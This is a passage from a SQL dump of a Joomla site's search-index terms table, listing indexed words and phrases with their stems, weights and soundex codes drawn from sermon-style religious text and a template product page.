(173826, 'to make you', 'to make you', 0, 1, 1.3667, 'T520', 5, '*'),
(173827, 'to regret', 'to regret', 0, 1, 1.3, 'T6263', 2, '*'),
(173828, 'to regret later', 'to regret later', 0, 1, 1.5, 'T6263436', 2, '*'),
(173829, 'to sit', 'to sit', 0, 1, 1.2, 'T230', 2, '*'),
(173830, 'to sit down', 'to sit down', 0, 1, 1.3667, 'T235', 2, '*'),
(173831, 'to sound', 'to sound', 0, 1, 1.2667, 'T253', 2, '*'),
(173832, 'to sound teaching', 'to sound teaching', 0, 1, 1.5667, 'T253252', 2, '*'),
(173833, 'to translate', 'to translate', 0, 1, 1.4, 'T65243', 2, '*'),
(173834, 'to translate your', 'to translate your', 0, 1, 1.5667, 'T652436', 2, '*'),
(173835, 'to your habits', 'to your habits', 0, 1, 1.4667, 'T6132', 2, '*'),
(173836, 'to your life', 'to your life', 0, 1, 1.4, 'T641', 2, '*'),
(173837, 'told us that', 'told us that', 0, 1, 1.4, 'T4323', 2, '*'),
(173838, 'told you', 'told you', 0, 1, 1.2667, 'T430', 3, '*'),
(173839, 'told you that', 'told you that', 0, 1, 1.4333, 'T430', 2, '*'),
(173840, 'too much', 'too much', 0, 1, 1.2667, 'T520', 2, '*'),
(173841, 'too much for', 'too much for', 0, 1, 1.4, 'T5216', 2, '*'),
(173842, 'too much remember', 'too much remember', 0, 1, 1.5667, 'T526516', 2, '*'),
(173843, 'too soon avoid', 'too soon avoid', 0, 1, 1.4667, 'T2513', 2, '*'),
(173844, 'tough', 'tough', 0, 0, 0.3333, 'T200', 4, '*'),
(173845, 'tough training', 'tough training', 0, 1, 1.4667, 'T23652', 2, '*'),
(173846, 'tough training is', 'tough training is', 0, 1, 1.5667, 'T23652', 2, '*'),
(173847, 'training and', 'train and', 0, 1, 1.4, 'T65253', 2, '*'),
(173848, 'training and complain', 'train and complain', 0, 1, 1.7, 'T6525325145', 2, '*'),
(173849, 'training and preparation', 'train and preparation', 0, 1, 1.8, 'T65253161635', 2, '*'),
(173850, 'training are', 'train are', 0, 1, 1.4, 'T6526', 2, '*'),
(173851, 'training are too', 'train are too', 0, 1, 1.5333, 'T65263', 2, '*'),
(173852, 'training in the', 'train in the', 0, 1, 1.5, 'T65253', 2, '*'),
(173853, 'training into', 'train into', 0, 1, 1.4333, 'T65253', 2, '*'),
(173854, 'training into habit', 'train into habit', 0, 1, 1.6333, 'T6525313', 2, '*'),
(173855, 'training into habits', 'train into habits', 0, 1, 1.6667, 'T65253132', 2, '*'),
(173856, 'training is', 'train is', 0, 1, 1.3667, 'T652', 2, '*'),
(173857, 'training is because', 'train is because', 0, 1, 1.6333, 'T65212', 2, '*'),
(173858, 'training is being', 'train is being', 0, 1, 1.5667, 'T652152', 2, '*'),
(173859, 'training might', 'train might', 0, 1, 1.4667, 'T652523', 2, '*'),
(173860, 'training might not', 'train might not', 0, 1, 1.6, 'T65252353', 2, '*'),
(173861, 'training only', 'train only', 0, 1, 1.4333, 'T65254', 2, '*'),
(173862, 'training only to', 'train only to', 0, 1, 1.5333, 'T652543', 2, '*'),
(173863, 'training serious', 'train serious', 0, 1, 1.5333, 'T65262', 2, '*'),
(173864, 'training serious the', 'train serious the', 0, 1, 1.6667, 'T652623', 2, '*'),
(173867, 'training to', 'train to', 0, 1, 1.3667, 'T6523', 2, '*'),
(173868, 'training to your', 'train to your', 0, 1, 1.5333, 'T65236', 2, '*'),
(173869, 'training you', 'train you', 0, 1, 1.4, 'T652', 2, '*'),
(173870, 'training you must', 'train you must', 0, 1, 1.5667, 'T652523', 2, '*'),
(173871, 'trainings', 'train', 0, 0, 0.6, 'T652', 2, '*'),
(173872, 'trainings the', 'train the', 0, 1, 1.4333, 'T6523', 2, '*'),
(173873, 'trainings the prayer', 'train the prayer', 0, 1, 1.6667, 'T652316', 2, '*'),
(173874, 'translate', 'translat', 0, 0, 0.6, 'T65243', 2, '*'),
(173875, 'translate training', 'translat training', 0, 1, 1.6, 'T65243652', 2, '*'),
(173876, 'translate training into', 'translat training into', 0, 1, 1.7667, 'T6524365253', 2, '*'),
(173877, 'translate your', 'translat your', 0, 1, 1.4667, 'T652436', 2, '*'),
(173878, 'translate your training', 'translat your training', 0, 1, 1.7667, 'T6524363652', 2, '*'),
(173879, 'try to escape', 'try to escape', 0, 1, 1.4333, 'T6321', 2, '*'),
(173880, 'twenty', 'twenti', 0, 0, 0.4, 'T530', 2, '*'),
(173881, 'twenty one', 'twenti one', 0, 1, 1.3333, 'T535', 2, '*'),
(173882, 'twenty one days', 'twenti one days', 0, 1, 1.5, 'T53532', 2, '*'),
(173883, 'unbroken negative', 'unbroken negative', 0, 1, 1.5667, 'U51625231', 2, '*'),
(173884, 'unbroken negative habits', 'unbroken negative habits', 0, 1, 1.8, 'U5162523132', 2, '*'),
(173885, 'unfit', 'unfit', 0, 0, 0.3333, 'U513', 4, '*'),
(173886, 'unfit and', 'unfit and', 0, 1, 1.3, 'U51353', 2, '*'),
(173887, 'unfit and powerless', 'unfit and powerless', 0, 1, 1.6333, 'U513531642', 2, '*'),
(173888, 'up in life', 'up in life', 0, 1, 1.3333, 'U1541', 2, '*'),
(173889, 'us that the', 'us that the', 0, 1, 1.3667, 'U230', 2, '*'),
(173890, 'value it', 'valu it', 0, 1, 1.2667, 'V430', 2, '*'),
(173891, 'value it adds', 'valu it adds', 0, 1, 1.4333, 'V432', 2, '*'),
(173892, 'vehicles', 'vehicl', 0, 0, 0.5333, 'V242', 2, '*'),
(173893, 'vehicles that', 'vehicl that', 0, 1, 1.4333, 'V2423', 2, '*'),
(173894, 'vehicles that determine', 'vehicl that determine', 0, 1, 1.7667, 'V242365', 2, '*'),
(173895, 'waste', 'wast', 0, 0, 0.3333, 'W230', 4, '*'),
(173896, 'waste divine', 'wast divine', 0, 1, 1.4, 'W2315', 2, '*'),
(173897, 'waste divine training', 'wast divine training', 0, 1, 1.7, 'W23153652', 2, '*'),
(173898, 'what habits', 'what habits', 0, 1, 1.3667, 'W3132', 2, '*'),
(173899, 'what habits are', 'what habits are', 0, 1, 1.5, 'W31326', 2, '*'),
(173900, 'when the substance', 'when the substance', 0, 1, 1.6, 'W53212352', 2, '*'),
(173901, 'when you confront', 'when you confront', 0, 1, 1.5667, 'W5251653', 2, '*'),
(173902, 'when you start', 'when you start', 0, 1, 1.4667, 'W52363', 2, '*'),
(173903, 'where you arrive', 'where you arrive', 0, 1, 1.5333, 'W610', 2, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(173904, 'where you eventually', 'where you eventually', 0, 1, 1.6667, 'W61534', 2, '*'),
(173905, 'who make', 'who make', 0, 1, 1.2667, 'W520', 2, '*'),
(173906, 'who make you', 'who make you', 0, 1, 1.4, 'W520', 2, '*'),
(173907, 'who try', 'who try', 0, 1, 1.2333, 'W360', 2, '*'),
(173908, 'who try to', 'who try to', 0, 1, 1.3333, 'W363', 2, '*'),
(173909, 'will be in', 'will be in', 0, 1, 1.3333, 'W415', 3, '*'),
(173910, 'will determine where', 'will determine where', 0, 1, 1.6667, 'W43656', 2, '*'),
(173911, 'will grow', 'will grow', 0, 1, 1.3, 'W426', 2, '*'),
(173912, 'will grow out', 'will grow out', 0, 1, 1.4333, 'W4263', 2, '*'),
(173913, 'will limit', 'will limit', 0, 1, 1.3333, 'W453', 2, '*'),
(173914, 'will limit how', 'will limit how', 0, 1, 1.4667, 'W453', 2, '*'),
(173915, 'with your training', 'with your training', 0, 1, 1.6, 'W363652', 2, '*'),
(173916, 'would be securing', 'would be securing', 0, 1, 1.5667, 'W4312652', 2, '*'),
(173917, 'you allow', 'you allow', 0, 1, 1.3, 'Y400', 2, '*'),
(173918, 'you allow to', 'you allow to', 0, 1, 1.4, 'Y430', 2, '*'),
(173919, 'you arrive', 'you arrive', 0, 1, 1.3333, 'Y610', 2, '*'),
(173920, 'you arrive in', 'you arrive in', 0, 1, 1.4333, 'Y615', 2, '*'),
(173921, 'you because the', 'you because the', 0, 1, 1.5, 'Y123', 2, '*'),
(173922, 'you confront', 'you confront', 0, 1, 1.4, 'Y251653', 2, '*'),
(173923, 'you confront him', 'you confront him', 0, 1, 1.5333, 'Y2516535', 2, '*'),
(173924, 'you cultivating', 'you cultivating', 0, 1, 1.5, 'Y2431352', 2, '*'),
(173925, 'you cultivating in', 'you cultivating in', 0, 1, 1.6, 'Y24313525', 2, '*'),
(173926, 'you do consistently', 'you do consistently', 0, 1, 1.6333, 'Y32523534', 2, '*'),
(173927, 'you don\'t peak', 'you don peak', 0, 1, 1.4667, 'Y35312', 2, '*'),
(173928, 'you eventually', 'you eventually', 0, 1, 1.4667, 'Y1534', 2, '*'),
(173929, 'you eventually end', 'you eventually end', 0, 1, 1.6, 'Y153453', 2, '*'),
(173930, 'you feel', 'you feel', 0, 1, 1.2667, 'Y140', 2, '*'),
(173931, 'you feel that', 'you feel that', 0, 1, 1.4333, 'Y143', 2, '*'),
(173932, 'you feels', 'you feels', 0, 1, 1.3, 'Y142', 2, '*'),
(173933, 'you feels that', 'you feels that', 0, 1, 1.4667, 'Y1423', 2, '*'),
(173934, 'you in destiny', 'you in destiny', 0, 1, 1.4667, 'Y53235', 2, '*'),
(173935, 'you must translate', 'you must translate', 0, 1, 1.6, 'Y52365243', 2, '*'),
(173936, 'you not waste', 'you not waste', 0, 1, 1.4333, 'Y5323', 2, '*'),
(173937, 'you start to', 'you start to', 0, 1, 1.4, 'Y2363', 2, '*'),
(173938, 'you that', 'you that', 0, 1, 1.2667, 'Y300', 5, '*'),
(173939, 'you that the', 'you that the', 0, 1, 1.4, 'Y300', 2, '*'),
(173940, 'you unfit', 'you unfit', 0, 1, 1.3, 'Y513', 2, '*'),
(173941, 'you unfit and', 'you unfit and', 0, 1, 1.4333, 'Y51353', 2, '*'),
(173942, 'you would be', 'you would be', 0, 1, 1.4, 'Y431', 2, '*'),
(173943, 'your daily life', 'your daily life', 0, 1, 1.5, 'Y6341', 2, '*'),
(173944, 'your destiny i', 'your destiny i', 0, 1, 1.4667, 'Y63235', 2, '*'),
(173945, 'your destiny journey', 'your destiny journey', 0, 1, 1.6667, 'Y63235265', 2, '*'),
(173946, 'your destiny there', 'your destiny there', 0, 1, 1.6, 'Y6323536', 2, '*'),
(173947, 'your future', 'your future', 0, 1, 1.3667, 'Y6136', 3, '*'),
(173948, 'your future in', 'your future in', 0, 1, 1.4667, 'Y61365', 3, '*'),
(173949, 'your habit', 'your habit', 0, 1, 1.3333, 'Y613', 2, '*'),
(173950, 'your habit adopt', 'your habit adopt', 0, 1, 1.5333, 'Y61313', 2, '*'),
(173951, 'your habits', 'your habits', 0, 1, 1.3667, 'Y6132', 2, '*'),
(173952, 'your habits are', 'your habits are', 0, 1, 1.5, 'Y61326', 2, '*'),
(173953, 'your habits the', 'your habits the', 0, 1, 1.5, 'Y61323', 2, '*'),
(173954, 'your habits what', 'your habits what', 0, 1, 1.5333, 'Y61323', 2, '*'),
(173955, 'your life in', 'your life in', 0, 1, 1.4, 'Y6415', 2, '*'),
(173956, 'your life the', 'your life the', 0, 1, 1.4333, 'Y6413', 7, '*'),
(173957, 'your life will', 'your life will', 0, 1, 1.4667, 'Y6414', 3, '*'),
(173958, 'your purpose', 'your purpose', 0, 1, 1.4, 'Y61612', 2, '*'),
(173959, 'your purpose in', 'your purpose in', 0, 1, 1.5, 'Y616125', 2, '*'),
(173960, 'your seemly', 'your seemly', 0, 1, 1.3667, 'Y6254', 2, '*'),
(173961, 'your seemly tough', 'your seemly tough', 0, 1, 1.5667, 'Y625432', 2, '*'),
(173963, 'your training to', 'your training to', 0, 1, 1.5333, 'Y636523', 2, '*'),
(173964, 'your training you', 'your training you', 0, 1, 1.5667, 'Y63652', 2, '*'),
(175411, '03', '03', 0, 0, 0.2, '', 4, '*'),
(175412, '03 2017', '03 2017', 0, 1, 1.2333, '', 4, '*'),
(175449, 'a man he', 'a man he', 0, 1, 1.2667, 'A500', 2, '*'),
(175484, 'are not doing', 'ar not doing', 0, 1, 1.4333, 'A65352', 2, '*'),
(175490, 'are two', 'ar two', 0, 1, 1.2333, 'A630', 3, '*'),
(175585, 'but for', 'but for', 0, 1, 1.2333, 'B316', 2, '*'),
(175588, 'can have', 'can have', 0, 1, 1.2667, 'C510', 3, '*'),
(175601, 'comes for', 'come for', 0, 1, 1.3, 'C5216', 2, '*'),
(175626, 'destroy', 'destroi', 0, 0, 0.4667, 'D236', 2, '*'),
(175627, 'destroy your', 'destroi your', 0, 1, 1.4, 'D236', 2, '*'),
(175644, 'do with your', 'do with your', 0, 1, 1.4, 'D600', 3, '*'),
(175649, 'doesn\'t matter', 'doesn matter', 0, 1, 1.4667, 'D253536', 2, '*'),
(175701, 'gets', 'get', 0, 0, 0.2667, 'G320', 4, '*'),
(175702, 'gets you', 'get you', 0, 1, 1.2667, 'G320', 2, '*'),
(175708, 'give your', 'give your', 0, 1, 1.3, 'G160', 2, '*'),
(175725, 'god does', 'god does', 0, 1, 1.2667, 'G320', 5, '*'),
(175726, 'god does not', 'god does not', 0, 1, 1.4, 'G3253', 5, '*'),
(175728, 'god if', 'god if', 0, 1, 1.2, 'G310', 4, '*'),
(175778, 'if your', 'if your', 0, 1, 1.2333, 'I160', 3, '*'),
(175813, 'it doesn\'t matter', 'it doesn matter', 0, 1, 1.5667, 'I3253536', 2, '*'),
(175830, 'just be', 'just be', 0, 1, 1.2333, 'J310', 2, '*'),
(175844, 'life i', 'life i', 0, 1, 1.2, 'L100', 2, '*'),
(175852, 'make all', 'make all', 0, 1, 1.2667, 'M240', 2, '*'),
(175853, 'make all the', 'make all the', 0, 1, 1.4, 'M243', 2, '*'),
(175855, 'man he', 'man he', 0, 1, 1.2, 'M000', 2, '*'),
(175857, 'manifestations', 'manifest', 0, 0, 0.9333, 'M12352', 2, '*'),
(175869, 'ministry and', 'ministri and', 0, 1, 1.4, 'M23653', 2, '*'),
(175887, 'not doing', 'not doing', 0, 1, 1.3, 'N352', 2, '*'),
(175942, 'promotion or', 'promot or', 0, 1, 1.4, 'P65356', 2, '*'),
(175946, 'rating', 'rate', 0, 0, 0.4, 'R352', 2, '*'),
(175957, 'responsible', 'respons', 0, 0, 0.7333, 'R215214', 3, '*'),
(175964, 'samson', 'samson', 0, 0, 0.4, 'S525', 2, '*'),
(175992, 'should you', 'should you', 0, 1, 1.3333, 'S430', 3, '*'),
(175999, 'shows up', 'show up', 0, 1, 1.2667, 'S100', 3, '*'),
(176010, 'spirit as', 'spirit as', 0, 1, 1.3, 'S1632', 3, '*'),
(176046, 'that was his', 'that was his', 0, 1, 1.4, 'T200', 2, '*'),
(176055, 'the ministry', 'the ministry', 0, 1, 1.4, 'T5236', 4, '*'),
(176062, 'there are two', 'there are two', 0, 1, 1.4333, 'T630', 3, '*'),
(176090, 'told me to', 'told me to', 0, 1, 1.3333, 'T4353', 3, '*'),
(176101, 'until you have', 'until you have', 0, 1, 1.4667, 'U5341', 2, '*'),
(176102, 'up and', 'up and', 0, 1, 1.2, 'U153', 2, '*'),
(176115, 'was his', 'wa his', 0, 1, 1.2333, 'W200', 3, '*'),
(176127, 'what determines', 'what determines', 0, 1, 1.5, 'W3652', 2, '*'),
(176139, 'what you do', 'what you do', 0, 1, 1.3667, 'W300', 2, '*'),
(176146, 'why should', 'why should', 0, 1, 1.3333, 'W243', 2, '*'),
(176147, 'why should you', 'why should you', 0, 1, 1.4667, 'W243', 2, '*'),
(176165, 'withdraw', 'withdraw', 0, 0, 0.5333, 'W360', 2, '*'),
(176168, 'withdrawn', 'withdrawn', 0, 0, 0.6, 'W365', 2, '*'),
(176169, 'withdrawn from', 'withdrawn from', 0, 1, 1.4667, 'W365165', 2, '*'),
(176191, 'you it', 'you it', 0, 1, 1.2, 'Y300', 3, '*'),
(176199, 'you ready', 'you ready', 0, 1, 1.3, 'Y630', 4, '*'),
(176200, 'you ready for', 'you ready for', 0, 1, 1.4333, 'Y6316', 3, '*'),
(176201, 'you should not', 'you should not', 0, 1, 1.4667, 'Y24353', 2, '*'),
(176230, 'your spirit as', 'your spirit as', 0, 1, 1.4667, 'Y621632', 2, '*'),
(176233, 'zion', 'zion', 0, 0, 0.2667, 'Z500', 3, '*'),
(176465, '1 8', '1 8', 0, 1, 1.1, '', 2, '*'),
(176484, '20 and', '20 and', 0, 1, 1.2, 'A530', 2, '*'),
(176488, '22 for', '22 for', 0, 1, 1.2, 'F600', 2, '*'),
(176504, 'a prophet', 'a prophet', 0, 1, 1.3, 'A1613', 3, '*'),
(176507, 'abraham', 'abraham', 0, 0, 0.4667, 'A165', 4, '*'),
(176528, 'and he shall', 'and he shall', 0, 1, 1.4, 'A5324', 2, '*'),
(176529, 'and in thy', 'and in thy', 0, 1, 1.3333, 'A5353', 2, '*'),
(176563, 'began', 'began', 0, 0, 0.3333, 'B250', 2, '*'),
(176593, 'children of', 'children of', 0, 1, 1.3667, 'C43651', 2, '*'),
(176596, 'christ is', 'christ is', 0, 1, 1.3, 'C6232', 2, '*'),
(176626, 'death', 'death', 0, 0, 0.3333, 'D000', 2, '*'),
(176637, 'did it', 'did it', 0, 1, 1.2, 'D000', 2, '*'),
(176644, 'earth be', 'earth be', 0, 1, 1.2667, 'E631', 2, '*'),
(176652, 'every one', 'everi one', 0, 1, 1.3, 'E165', 2, '*'),
(176669, 'following points', 'follow points', 0, 1, 1.5333, 'F4521532', 2, '*'),
(176693, 'fulfilled', 'fulfil', 0, 0, 0.6, 'F4143', 4, '*'),
(176706, 'god help', 'god help', 0, 1, 1.2667, 'G341', 3, '*'),
(176707, 'god help you', 'god help you', 0, 1, 1.4, 'G341', 3, '*'),
(176724, 'god\'s plan', 'god plan', 0, 1, 1.3333, 'G32145', 5, '*'),
(176725, 'god\'s plan for', 'god plan for', 0, 1, 1.4667, 'G3214516', 4, '*'),
(176758, 'he shall', 'he shall', 0, 1, 1.2667, 'H240', 2, '*'),
(176781, 'him god', 'him god', 0, 1, 1.2333, 'H523', 2, '*'),
(176791, 'him that', 'him that', 0, 1, 1.2667, 'H530', 2, '*'),
(176798, 'his help', 'hi help', 0, 1, 1.2667, 'H241', 2, '*'),
(176824, 'in all things', 'in all things', 0, 1, 1.4333, 'I54352', 2, '*'),
(176832, 'in thy', 'in thy', 0, 1, 1.2, 'I530', 2, '*'),
(176847, 'it as', 'it as', 0, 1, 1.1667, 'I320', 3, '*'),
(176891, 'made with', 'made with', 0, 1, 1.3, 'M300', 3, '*'),
(176896, 'may god', 'mai god', 0, 1, 1.2333, 'M230', 3, '*'),
(176897, 'may god help', 'mai god help', 0, 1, 1.4, 'M2341', 3, '*'),
(176905, 'moses', 'mose', 0, 0, 0.3333, 'M200', 2, '*'),
(176908, 'mouth of', 'mouth of', 0, 1, 1.2667, 'M310', 2, '*'),
(176958, 'on to', 'on to', 0, 1, 1.1667, 'O530', 2, '*'),
(176969, 'other things', 'other things', 0, 1, 1.4, 'O36352', 3, '*'),
(176981, 'plan for', 'plan for', 0, 1, 1.2667, 'P4516', 5, '*'),
(177005, 'raise', 'rais', 0, 0, 0.3333, 'R200', 5, '*'),
(177030, 'said unto', 'said unto', 0, 1, 1.3, 'S353', 2, '*'),
(177045, 'see the', 'see the', 0, 1, 1.2333, 'S300', 2, '*'),
(177053, 'sent', 'sent', 0, 0, 0.2667, 'S530', 4, '*'),
(177078, 'since', 'sinc', 0, 0, 0.3333, 'S520', 3, '*'),
(177116, 'tell him', 'tell him', 0, 1, 1.2667, 'T450', 3, '*'),
(177125, 'that follow', 'that follow', 0, 1, 1.3667, 'T140', 2, '*'),
(177135, 'the children', 'the children', 0, 1, 1.4, 'T24365', 4, '*'),
(177136, 'the children of', 'the children of', 0, 1, 1.5, 'T243651', 2, '*'),
(177141, 'the earth be', 'the earth be', 0, 1, 1.4, 'T631', 2, '*'),
(177146, 'the following points', 'the following points', 0, 1, 1.6667, 'T14521532', 2, '*'),
(177156, 'the mouth of', 'the mouth of', 0, 1, 1.4, 'T531', 2, '*'),
(177158, 'the people', 'the people', 0, 1, 1.3333, 'T140', 4, '*'),
(177198, 'to know how', 'to know how', 0, 1, 1.3667, 'T250', 2, '*'),
(177203, 'to see', 'to see', 0, 1, 1.2, 'T200', 2, '*'),
(177262, 'whatsoever', 'whatsoev', 0, 0, 0.6667, 'W3216', 3, '*'),
(177263, 'whatsoever he', 'whatsoev he', 0, 1, 1.4333, 'W3216', 2, '*'),
(177303, 'yea', 'yea', 0, 0, 0.2, 'Y000', 2, '*'),
(177304, 'yea and', 'yea and', 0, 1, 1.2333, 'Y530', 2, '*'),
(177311, 'you as you', 'you as you', 0, 1, 1.3333, 'Y200', 3, '*'),
(178514, '13-16', '13-16', 0, 0, 0.5, '', 3, '*'),
(178567, 'being straight', 'be straight', 0, 1, 1.4667, 'B523623', 2, '*'),
(178605, 'course', 'cours', 0, 0, 0.4, 'C620', 3, '*'),
(178617, 'doctrine', 'doctrin', 0, 0, 0.5333, 'D2365', 2, '*'),
(178618, 'doctrine of', 'doctrin of', 0, 1, 1.3667, 'D23651', 2, '*'),
(178619, 'doctrine of just', 'doctrin of just', 0, 1, 1.5333, 'D2365123', 2, '*'),
(178646, 'from god\'s', 'from god', 0, 1, 1.3333, 'F65232', 2, '*'),
(178652, 'gain', 'gain', 0, 0, 0.2667, 'G500', 2, '*'),
(178688, 'integrity', 'integr', 0, 0, 0.6, 'I53263', 2, '*'),
(178706, 'just weight', 'just weight', 0, 1, 1.3667, 'J323', 2, '*'),
(178741, 'measures', 'measur', 0, 0, 0.5333, 'M262', 2, '*'),
(178769, 'of a man', 'of a man', 0, 1, 1.2667, 'O150', 5, '*'),
(178771, 'of just', 'of just', 0, 1, 1.2333, 'O123', 3, '*'),
(178775, 'of weights', 'of weights', 0, 1, 1.3333, 'O1232', 2, '*'),
(178843, 'scales', 'scale', 0, 0, 0.4, 'S420', 2, '*'),
(178866, 'straight', 'straight', 0, 0, 0.5333, 'S3623', 3, '*'),
(178881, 'terms', 'term', 0, 0, 0.3333, 'T652', 2, '*'),
(178884, 'texts', 'text', 0, 0, 0.3333, 'T232', 3, '*'),
(178891, 'the doctrine', 'the doctrine', 0, 1, 1.4, 'T2365', 2, '*'),
(178892, 'the doctrine of', 'the doctrine of', 0, 1, 1.5, 'T23651', 2, '*'),
(178894, 'the just weight', 'the just weight', 0, 1, 1.5, 'T2323', 2, '*'),
(178897, 'the other', 'the other', 0, 1, 1.3, 'T600', 6, '*'),
(178905, 'thing to', 'thing to', 0, 1, 1.2667, 'T523', 3, '*'),
(178932, 'values', 'valu', 0, 0, 0.4, 'V420', 5, '*'),
(178938, 'weight', 'weight', 0, 0, 0.4, 'W230', 3, '*'),
(178946, 'weights', 'weight', 0, 0, 0.4667, 'W232', 3, '*'),
(178955, 'witness', 'wit', 0, 0, 0.4667, 'W352', 2, '*'),
(182256, 'be as', 'be as', 0, 1, 1.1667, 'B200', 2, '*'),
(182404, 'heb', 'heb', 0, 0, 0.2, 'H100', 2, '*'),
(182716, 'then you', 'then you', 0, 1, 1.2667, 'T500', 3, '*'),
(182843, 'yourselves', 'yourselv', 0, 0, 0.6667, 'Y62412', 2, '*'),
(183117, 'difficult to produce', 'difficult to produce', 0, 1, 1.6667, 'D12431632', 2, '*'),
(183124, 'to produce', 'to produce', 0, 1, 1.3333, 'T1632', 2, '*'),
(185203, '33', '33', 0, 0, 0.2, '', 3, '*'),
(185256, 'almost', 'almost', 0, 0, 0.4, 'A4523', 3, '*'),
(185257, 'almost always', 'almost always', 0, 1, 1.4333, 'A452342', 2, '*'),
(185313, 'are more', 'ar more', 0, 1, 1.2667, 'A656', 2, '*'),
(185402, 'but who', 'but who', 0, 1, 1.2333, 'B300', 2, '*'),
(185567, 'head', 'head', 0, 0, 0.2667, 'H300', 3, '*'),
(185609, 'inner', 'inner', 0, 0, 0.3333, 'I560', 3, '*'),
(185623, 'is written', 'is written', 0, 1, 1.3333, 'I2635', 2, '*'),
(185791, 'parts', 'part', 0, 0, 0.3333, 'P632', 2, '*'),
(185806, 'placed on', 'place on', 0, 1, 1.3, 'P4235', 2, '*'),
(185818, 'precious', 'preciou', 0, 0, 0.5333, 'P620', 2, '*'),
(185824, 'pro', 'pro', 0, 0, 0.2, 'P600', 2, '*'),
(185917, 'spirit from', 'spirit from', 0, 1, 1.3667, 'S163165', 2, '*'),
(185993, 'strengthened', 'strengthen', 0, 0, 0.8, 'S3652353', 2, '*'),
(186103, 'through life', 'through life', 0, 1, 1.4, 'T6241', 2, '*'),
(186160, 'weak', 'weak', 0, 0, 0.2667, 'W200', 3, '*'),
(189269, '1 make', '1 make', 0, 1, 1.2, 'M200', 1, '*'),
(189270, '1 make that', '1 make that', 0, 1, 1.3667, 'M230', 1, '*'),
(189271, 'another take', 'anoth take', 0, 1, 1.4, 'A53632', 1, '*'),
(189272, 'another take up', 'anoth take up', 0, 1, 1.5, 'A536321', 1, '*'),
(189273, 'enter another take', 'enter another take', 0, 1, 1.6, 'E53653632', 1, '*'),
(189274, 'item 1', 'item 1', 0, 1, 1.2, 'I350', 1, '*'),
(189275, 'item 1 make', 'item 1 make', 0, 1, 1.3667, 'I352', 1, '*'),
(189276, 'k2 item 1', 'k2 item 1', 0, 1, 1.3, 'K350', 1, '*'),
(189277, 'make that idea', 'make that idea', 0, 1, 1.4667, 'M230', 1, '*'),
(189278, 'that idea your', 'that idea your', 0, 1, 1.4667, 'T600', 1, '*'),
(189284, '2 be', '2 be', 0, 1, 1.1333, 'B000', 1, '*'),
(189285, '2 be kind', '2 be kind', 0, 1, 1.3, 'B253', 1, '*'),
(189286, 'be kind', 'be kind', 0, 1, 1.2333, 'B253', 1, '*'),
(189287, 'be kind whenever', 'be kind whenever', 0, 1, 1.5333, 'B253516', 1, '*'),
(189288, 'item 2', 'item 2', 0, 1, 1.2, 'I350', 1, '*'),
(189289, 'item 2 be', 'item 2 be', 0, 1, 1.3, 'I351', 1, '*'),
(189290, 'k2 item 2', 'k2 item 2', 0, 1, 1.3, 'K350', 1, '*'),
(189291, 'kind whenever', 'kind whenever', 0, 1, 1.4333, 'K53516', 1, '*'),
(189292, 'kind whenever possible', 'kind whenever possible', 0, 1, 1.7333, 'K535161214', 1, '*'),
(189293, 'whenever possible', 'whenev possible', 0, 1, 1.5667, 'W5161214', 1, '*'),
(189299, '10 preset', '10 preset', 0, 1, 1.3, 'P623', 1, '*'),
(189300, '10 preset pages', '10 preset pages', 0, 1, 1.5, 'P62312', 1, '*'),
(189301, '10 unique', '10 unique', 0, 1, 1.3, 'U520', 1, '*'),
(189302, '10 unique color', '10 unique color', 0, 1, 1.5, 'U5246', 1, '*'),
(189303, '3 abana', '3 abana', 0, 1, 1.2333, 'A150', 1, '*'),
(189304, '3 abana joomla', '3 abana joomla', 0, 1, 1.4667, 'A15254', 1, '*'),
(189305, '3.6', '3.6', 0, 0, 0.3, '', 1, '*'),
(189306, '3.6 to', '3.6 to', 0, 1, 1.2, 'T000', 1, '*'),
(189307, '3.6 to 8', '3.6 to 8', 0, 1, 1.2667, 'T000', 1, '*'),
(189308, '404', '404', 0, 0, 0.3, '', 1, '*'),
(189309, '404 error', '404 error', 0, 1, 1.3, 'E600', 1, '*'),
(189310, '404 error page', '404 error page', 0, 1, 1.4667, 'E612', 1, '*'),
(189311, '6 sliders', '6 sliders', 0, 1, 1.3, 'S4362', 1, '*'),
(189312, '6 sliders included', '6 sliders included', 0, 1, 1.6, 'S43625243', 1, '*'),
(189313, '60 html', '60 html', 0, 1, 1.2333, 'H354', 1, '*'),
(189314, '60 html pages', '60 html pages', 0, 1, 1.4333, 'H35412', 1, '*'),
(189315, '8 chrome', '8 chrome', 0, 1, 1.2667, 'C650', 1, '*'),
(189316, '8 chrome opera', '8 chrome opera', 0, 1, 1.4667, 'C6516', 1, '*'),
(189317, 'a blend', 'a blend', 0, 1, 1.2333, 'A1453', 1, '*'),
(189318, 'a blend of', 'a blend of', 0, 1, 1.3333, 'A14531', 1, '*'),
(189319, 'a clean', 'a clean', 0, 1, 1.2333, 'A245', 1, '*'),
(189320, 'a clean and', 'a clean and', 0, 1, 1.3667, 'A2453', 1, '*'),
(189321, 'a glance', 'a glance', 0, 1, 1.2667, 'A2452', 1, '*'),
(189322, 'a glance are', 'a glance are', 0, 1, 1.4, 'A24526', 1, '*'),
(189323, 'a variety', 'a variety', 0, 1, 1.3, 'A163', 1, '*'),
(189324, 'a variety of', 'a variety of', 0, 1, 1.4, 'A1631', 1, '*'),
(189325, 'abana', 'abana', 0, 0, 0.3333, 'A150', 1, '*'),
(189326, 'abana joomla', 'abana joomla', 0, 1, 1.4, 'A15254', 1, '*'),
(189327, 'abana joomla template', 'abana joomla template', 0, 1, 1.7, 'A1525435143', 1, '*'),
(189328, 'advanced', 'advanc', 0, 0, 0.5333, 'A31523', 2, '*'),
(189329, 'advanced multi-level', 'advanc multi-level', 0, 1, 1.6667, 'A31523543414', 1, '*'),
(189330, 'advanced multi-level dropdown', 'advanc multi-level dropdown', 0, 1, 1.9667, 'A3152354341436135', 1, '*'),
(189331, 'ajax', 'ajax', 0, 0, 0.2667, 'A200', 1, '*'),
(189332, 'ajax results', 'ajax results', 0, 1, 1.4, 'A262432', 1, '*'),
(189333, 'ajax results without', 'ajax results without', 0, 1, 1.6667, 'A2624323', 1, '*'),
(189334, 'all kinds', 'all kinds', 0, 1, 1.3, 'A42532', 3, '*'),
(189335, 'all kinds of', 'all kinds of', 0, 1, 1.4, 'A425321', 3, '*'),
(189336, 'and ajax', 'and ajax', 0, 1, 1.2667, 'A532', 1, '*'),
(189337, 'and ajax results', 'and ajax results', 0, 1, 1.5333, 'A53262432', 1, '*'),
